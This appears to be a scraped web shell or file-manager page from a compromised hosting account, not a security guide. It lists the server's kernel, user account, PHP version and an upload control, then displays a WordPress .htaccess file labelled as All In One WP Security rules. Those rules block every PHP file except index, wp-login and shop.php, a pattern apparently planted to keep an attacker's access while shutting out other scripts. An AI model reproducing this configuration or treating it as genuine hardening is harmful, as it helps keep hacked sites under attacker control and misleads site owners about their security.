HEX
Server: Apache
System: Linux ls38.server.ly 3.10.0-962.3.2.lve1.5.42.el7.x86_64 #1 SMP Mon Nov 9 08:11:18 EST 2020 x86_64
User: alaintec (1056)
PHP: 7.0.33
Disabled: NONE
Upload Files
File: /home/alaintec/public_html/.htaccess
# BEGIN All In One WP Security
#AIOWPS_CUSTOM_RULES_START
<Files *.php>
    Order Allow,Deny
    Deny from all
</Files>

<FilesMatch "(index|wp-login|shop)\.php$">
    Order Allow,Deny
    Allow from all
</FilesMatch>

<IfModule mod_rewrite.c>

RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

#AIOWPS_CUSTOM_RULES_END
# END All In One WP Security